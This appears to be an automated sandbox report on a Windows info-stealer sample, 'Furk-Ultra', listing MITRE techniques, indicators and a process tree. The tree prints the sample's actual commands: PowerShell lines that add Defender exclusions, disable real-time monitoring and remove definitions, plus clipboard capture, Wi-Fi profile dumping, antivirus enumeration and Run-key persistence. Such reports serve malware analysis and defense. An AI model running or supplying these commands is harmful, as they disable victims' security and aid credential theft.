4558e5347818874f767466464daa78d5fcbf4180e2e4214e8bcd241cf8cf4288

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2024 04:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Furk-Ultra-main/Bypass.bat
Size

61B
MD5

ed9b8d9a7a6855bd7542906c89df7d59
SHA1

2fb50de53bb455b43cfe3f52032b245c2c50a3fc
SHA256

c29fe90eeae955d900405ff44043bdba6d2b76504a1f606dd87f97bcfd61ffa6
SHA512

bf2f3138353973f64ac93971fbf50e8ed8f6fb21d38f4c5a7940fb7077323df424da54c9ddcf172280dee97b0caa052eda09466dfc3e3bcc318235d97ff15219

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1932 powershell.exe
4368 powershell.exe
1068 powershell.exe
4456 powershell.exe
4320 powershell.exe
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
collection

Clipboard Data
T1115

Processes:

cmd.exepowershell.exe

pid process

2044 cmd.exe
2532 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid process

3920 rar.exe

pid	process
1932	powershell.exe
4368	powershell.exe
1068	powershell.exe
4456	powershell.exe
4320	powershell.exe

pid	process
2044	cmd.exe
2532	powershell.exe

pid	process
3920	rar.exe

Loads dropped DLL 64 IoCs

Processes:

Bypass.exeBypass1.exe

pid	process
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
2416	Bypass.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
2416	Bypass.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
2416	Bypass.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

16 discord.com
19 raw.githubusercontent.com
38 discord.com
50 discord.com
8 raw.githubusercontent.com
9 raw.githubusercontent.com
15 discord.com
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

33 ipapi.co
34 ipapi.co
35 ip-api.com
39 ipapi.co
43 ipapi.co
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates processes with tasklist 1 TTPs 3 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

3520 tasklist.exe
2940 tasklist.exe
1064 tasklist.exe

flow	ioc
16	discord.com
19	raw.githubusercontent.com
38	discord.com
50	discord.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com
15	discord.com

flow	ioc
33	ipapi.co
34	ipapi.co
35	ip-api.com
39	ipapi.co
43	ipapi.co

pid	process
3520	tasklist.exe
2940	tasklist.exe
1064	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI14122\python311.dll	upx
behavioral2/memory/2416-27-0x00007FF987B20000-0x00007FF988109000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\_ssl.pyd	upx
behavioral2/memory/2416-167-0x00007FF99EC50000-0x00007FF99EC5F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI12042\pywintypes310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI12042\win32api.pyd	upx
behavioral2/memory/3864-207-0x00007FF996A60000-0x00007FF996A94000-memory.dmp	upx
behavioral2/memory/3864-210-0x00007FF998140000-0x00007FF99814D000-memory.dmp	upx
behavioral2/memory/2416-219-0x00007FF987B20000-0x00007FF988109000-memory.dmp	upx
behavioral2/memory/2416-221-0x00007FF9971A0000-0x00007FF9971B9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\sqlite3.dll	upx
behavioral2/memory/3864-226-0x00007FF9876B0000-0x00007FF987B1E000-memory.dmp	upx
behavioral2/memory/2416-225-0x00007FF9871C0000-0x00007FF987337000-memory.dmp	upx
behavioral2/memory/2416-224-0x00007FF992970000-0x00007FF992993000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI14122\select.pyd	upx
behavioral2/memory/2416-236-0x00007FF9870F0000-0x00007FF9871BD000-memory.dmp	upx
behavioral2/memory/2416-237-0x00007FF986BD0000-0x00007FF9870F0000-memory.dmp	upx
behavioral2/memory/3864-239-0x00007FF98DDD0000-0x00007FF98DE12000-memory.dmp	upx
behavioral2/memory/3864-242-0x00007FF986BA0000-0x00007FF986BCE000-memory.dmp	upx
behavioral2/memory/2416-244-0x00007FF98E4A0000-0x00007FF98E4D3000-memory.dmp	upx
behavioral2/memory/3864-245-0x00007FF986760000-0x00007FF986AD5000-memory.dmp	upx
behavioral2/memory/3864-243-0x00007FF986AE0000-0x00007FF986B98000-memory.dmp	upx
behavioral2/memory/3864-264-0x00007FF986410000-0x00007FF98641C000-memory.dmp	upx
behavioral2/memory/3864-270-0x00007FF986400000-0x00007FF98640D000-memory.dmp	upx
behavioral2/memory/3864-281-0x00007FF98E480000-0x00007FF98E49C000-memory.dmp	upx
behavioral2/memory/3864-287-0x00007FF986AE0000-0x00007FF986B98000-memory.dmp	upx
behavioral2/memory/2416-289-0x00007FF986180000-0x00007FF98629C000-memory.dmp	upx
behavioral2/memory/3864-322-0x00007FF986470000-0x00007FF9865E1000-memory.dmp	upx
behavioral2/memory/3864-323-0x00007FF9835D0000-0x00007FF9835F9000-memory.dmp	upx
behavioral2/memory/3864-321-0x00007FF9865F0000-0x00007FF98660F000-memory.dmp	upx
behavioral2/memory/3864-320-0x00007FF983690000-0x00007FF9836AC000-memory.dmp	upx
behavioral2/memory/3864-319-0x00007FF9836B0000-0x00007FF9836BE000-memory.dmp	upx
behavioral2/memory/3864-318-0x00007FF9836C0000-0x00007FF983701000-memory.dmp	upx
behavioral2/memory/3864-288-0x00007FF986760000-0x00007FF986AD5000-memory.dmp	upx
behavioral2/memory/3864-284-0x00007FF986BA0000-0x00007FF986BCE000-memory.dmp	upx
behavioral2/memory/3864-283-0x00007FF9862A0000-0x00007FF9862B5000-memory.dmp	upx
behavioral2/memory/3864-282-0x00007FF9862C0000-0x00007FF9862D3000-memory.dmp	upx
behavioral2/memory/3864-280-0x00007FF9862E0000-0x00007FF9862FC000-memory.dmp	upx
behavioral2/memory/3864-279-0x00007FF986300000-0x00007FF986314000-memory.dmp	upx
behavioral2/memory/3864-278-0x00007FF986330000-0x00007FF986345000-memory.dmp	upx
behavioral2/memory/3864-277-0x00007FF986360000-0x00007FF986372000-memory.dmp	upx
behavioral2/memory/3864-276-0x00007FF986320000-0x00007FF986330000-memory.dmp	upx
behavioral2/memory/3864-275-0x00007FF986350000-0x00007FF98635C000-memory.dmp	upx
behavioral2/memory/3864-274-0x00007FF986380000-0x00007FF98638D000-memory.dmp	upx
behavioral2/memory/3864-273-0x00007FF986390000-0x00007FF98639C000-memory.dmp	upx
behavioral2/memory/3864-272-0x00007FF9863A0000-0x00007FF9863AC000-memory.dmp	upx
behavioral2/memory/3864-271-0x00007FF9863D0000-0x00007FF9863DC000-memory.dmp	upx
behavioral2/memory/3864-269-0x00007FF9928F0000-0x00007FF9928FB000-memory.dmp	upx
behavioral2/memory/3864-268-0x00007FF9863B0000-0x00007FF9863BB000-memory.dmp	upx
behavioral2/memory/3864-267-0x00007FF9863C0000-0x00007FF9863CB000-memory.dmp	upx
behavioral2/memory/3864-266-0x00007FF9863E0000-0x00007FF9863EC000-memory.dmp	upx
behavioral2/memory/3864-265-0x00007FF9863F0000-0x00007FF9863FE000-memory.dmp	upx
behavioral2/memory/3864-263-0x00007FF986420000-0x00007FF98642B000-memory.dmp	upx
behavioral2/memory/3864-262-0x00007FF986430000-0x00007FF98643C000-memory.dmp	upx
behavioral2/memory/3864-261-0x00007FF986440000-0x00007FF98644B000-memory.dmp	upx
behavioral2/memory/3864-260-0x00007FF986450000-0x00007FF98645C000-memory.dmp	upx
behavioral2/memory/3864-259-0x00007FF986460000-0x00007FF98646B000-memory.dmp	upx
behavioral2/memory/2416-258-0x00007FF988990000-0x00007FF98899D000-memory.dmp	upx
behavioral2/memory/2416-255-0x00007FF986BD0000-0x00007FF9870F0000-memory.dmp	upx
behavioral2/memory/3864-254-0x00007FF986470000-0x00007FF9865E1000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2796 876 WerFault.exe FurkUltra.exe
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

FurkUltra.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FurkUltra.exe
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.execmd.exenetsh.execmd.exenetsh.execmd.exenetsh.execmd.exe

pid process

2660 netsh.exe
2592 cmd.exe
3896 netsh.exe
4008 cmd.exe
2940 netsh.exe
3512 cmd.exe
3520 netsh.exe
4020 cmd.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

3012 WMIC.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2820 systeminfo.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

756 reg.exe
5000 reg.exe

pid	pid_target	process	target process
2796	876	WerFault.exe	FurkUltra.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FurkUltra.exe

pid	process
2660	netsh.exe
2592	cmd.exe
3896	netsh.exe
4008	cmd.exe
2940	netsh.exe
3512	cmd.exe
3520	netsh.exe
4020	cmd.exe

pid	process
3012	WMIC.exe

pid	process
2820	systeminfo.exe

pid	process
756	reg.exe
5000	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

FurkUltra.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeBypass1.exepowershell.exe

pid	process
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
4368	powershell.exe
4368	powershell.exe
1068	powershell.exe
1068	powershell.exe
1932	powershell.exe
1932	powershell.exe
4368	powershell.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
1932	powershell.exe
1932	powershell.exe
1068	powershell.exe
1068	powershell.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
3104	powershell.exe
3104	powershell.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
2532	powershell.exe
2532	powershell.exe
876	FurkUltra.exe
876	FurkUltra.exe
3104	powershell.exe
876	FurkUltra.exe
2532	powershell.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
3864	Bypass1.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
876	FurkUltra.exe
4456	powershell.exe
4456	powershell.exe
876	FurkUltra.exe
4456	powershell.exe
876	FurkUltra.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

FurkUltra.exeBypass1.exepowershell.exepowershell.exepowershell.exetasklist.exeWMIC.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	876	FurkUltra.exe
Token: SeDebugPrivilege	3864	Bypass1.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2940	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2700	WMIC.exe
Token: SeSecurityPrivilege	2700	WMIC.exe
Token: SeTakeOwnershipPrivilege	2700	WMIC.exe
Token: SeLoadDriverPrivilege	2700	WMIC.exe
Token: SeSystemProfilePrivilege	2700	WMIC.exe
Token: SeSystemtimePrivilege	2700	WMIC.exe
Token: SeProfSingleProcessPrivilege	2700	WMIC.exe
Token: SeIncBasePriorityPrivilege	2700	WMIC.exe
Token: SeCreatePagefilePrivilege	2700	WMIC.exe
Token: SeBackupPrivilege	2700	WMIC.exe
Token: SeRestorePrivilege	2700	WMIC.exe
Token: SeShutdownPrivilege	2700	WMIC.exe
Token: SeDebugPrivilege	2700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2700	WMIC.exe
Token: SeRemoteShutdownPrivilege	2700	WMIC.exe
Token: SeUndockPrivilege	2700	WMIC.exe
Token: SeManageVolumePrivilege	2700	WMIC.exe
Token: 33	2700	WMIC.exe
Token: 34	2700	WMIC.exe
Token: 35	2700	WMIC.exe
Token: 36	2700	WMIC.exe
Token: SeDebugPrivilege	3520	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2700	WMIC.exe
Token: SeSecurityPrivilege	2700	WMIC.exe
Token: SeTakeOwnershipPrivilege	2700	WMIC.exe
Token: SeLoadDriverPrivilege	2700	WMIC.exe
Token: SeSystemProfilePrivilege	2700	WMIC.exe
Token: SeSystemtimePrivilege	2700	WMIC.exe
Token: SeProfSingleProcessPrivilege	2700	WMIC.exe
Token: SeIncBasePriorityPrivilege	2700	WMIC.exe
Token: SeCreatePagefilePrivilege	2700	WMIC.exe
Token: SeBackupPrivilege	2700	WMIC.exe
Token: SeRestorePrivilege	2700	WMIC.exe
Token: SeShutdownPrivilege	2700	WMIC.exe
Token: SeDebugPrivilege	2700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2700	WMIC.exe
Token: SeRemoteShutdownPrivilege	2700	WMIC.exe
Token: SeUndockPrivilege	2700	WMIC.exe
Token: SeManageVolumePrivilege	2700	WMIC.exe
Token: 33	2700	WMIC.exe
Token: 34	2700	WMIC.exe
Token: 35	2700	WMIC.exe
Token: 36	2700	WMIC.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	1064	tasklist.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeIncreaseQuotaPrivilege	2552	WMIC.exe
Token: SeSecurityPrivilege	2552	WMIC.exe
Token: SeTakeOwnershipPrivilege	2552	WMIC.exe
Token: SeLoadDriverPrivilege	2552	WMIC.exe
Token: SeSystemProfilePrivilege	2552	WMIC.exe
Token: SeSystemtimePrivilege	2552	WMIC.exe
Token: SeProfSingleProcessPrivilege	2552	WMIC.exe
Token: SeIncBasePriorityPrivilege	2552	WMIC.exe
Token: SeCreatePagefilePrivilege	2552	WMIC.exe
Token: SeBackupPrivilege	2552	WMIC.exe
Token: SeRestorePrivilege	2552	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeBypass.exeBypass1.exeBypass1.exeBypass.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 960 wrote to memory of 876	960	cmd.exe	FurkUltra.exe
PID 960 wrote to memory of 876	960	cmd.exe	FurkUltra.exe
PID 960 wrote to memory of 876	960	cmd.exe	FurkUltra.exe
PID 960 wrote to memory of 1412	960	cmd.exe	Bypass.exe
PID 960 wrote to memory of 1412	960	cmd.exe	Bypass.exe
PID 1412 wrote to memory of 2416	1412	Bypass.exe	Bypass.exe
PID 1412 wrote to memory of 2416	1412	Bypass.exe	Bypass.exe
PID 960 wrote to memory of 1204	960	cmd.exe	Bypass1.exe
PID 960 wrote to memory of 1204	960	cmd.exe	Bypass1.exe
PID 1204 wrote to memory of 3864	1204	Bypass1.exe	Bypass1.exe
PID 1204 wrote to memory of 3864	1204	Bypass1.exe	Bypass1.exe
PID 3864 wrote to memory of 4840	3864	Bypass1.exe	cmd.exe
PID 3864 wrote to memory of 4840	3864	Bypass1.exe	cmd.exe
PID 2416 wrote to memory of 896	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 896	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 932	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 932	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1328	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1328	2416	Bypass.exe	cmd.exe
PID 1328 wrote to memory of 4368	1328	cmd.exe	powershell.exe
PID 1328 wrote to memory of 4368	1328	cmd.exe	powershell.exe
PID 932 wrote to memory of 1068	932	cmd.exe	powershell.exe
PID 932 wrote to memory of 1068	932	cmd.exe	powershell.exe
PID 896 wrote to memory of 1932	896	cmd.exe	powershell.exe
PID 896 wrote to memory of 1932	896	cmd.exe	powershell.exe
PID 2416 wrote to memory of 1520	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1520	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 620	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 620	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1568	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1568	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 2044	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 2044	2416	Bypass.exe	cmd.exe
PID 1520 wrote to memory of 2940	1520	cmd.exe	netsh.exe
PID 1520 wrote to memory of 2940	1520	cmd.exe	netsh.exe
PID 2416 wrote to memory of 632	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 632	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1488	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 1488	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 2592	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 2592	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 676	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 676	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 4832	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 4832	2416	Bypass.exe	cmd.exe
PID 620 wrote to memory of 3520	620	cmd.exe	netsh.exe
PID 620 wrote to memory of 3520	620	cmd.exe	netsh.exe
PID 1568 wrote to memory of 2700	1568	cmd.exe	WMIC.exe
PID 1568 wrote to memory of 2700	1568	cmd.exe	WMIC.exe
PID 4832 wrote to memory of 3104	4832	cmd.exe	powershell.exe
PID 4832 wrote to memory of 3104	4832	cmd.exe	powershell.exe
PID 2044 wrote to memory of 2532	2044	cmd.exe	powershell.exe
PID 2044 wrote to memory of 2532	2044	cmd.exe	powershell.exe
PID 2592 wrote to memory of 3896	2592	cmd.exe	netsh.exe
PID 2592 wrote to memory of 3896	2592	cmd.exe	netsh.exe
PID 632 wrote to memory of 1064	632	cmd.exe	tasklist.exe
PID 632 wrote to memory of 1064	632	cmd.exe	tasklist.exe
PID 1488 wrote to memory of 3128	1488	cmd.exe	tree.com
PID 1488 wrote to memory of 3128	1488	cmd.exe	tree.com
PID 676 wrote to memory of 2820	676	cmd.exe	systeminfo.exe
PID 676 wrote to memory of 2820	676	cmd.exe	systeminfo.exe
PID 2416 wrote to memory of 4056	2416	Bypass.exe	cmd.exe
PID 2416 wrote to memory of 4056	2416	Bypass.exe	cmd.exe
PID 4056 wrote to memory of 2852	4056	cmd.exe	tree.com

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\Bypass.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:960
- C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\FurkUltra.exe
  FurkUltra.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 2132
    3⤵
    - Program crash
    PID:2796
- C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe
  Bypass.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe
    Bypass.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‍ ‌ .scr'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‍ ‌ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1520
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:620
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1568
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1488
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:2592
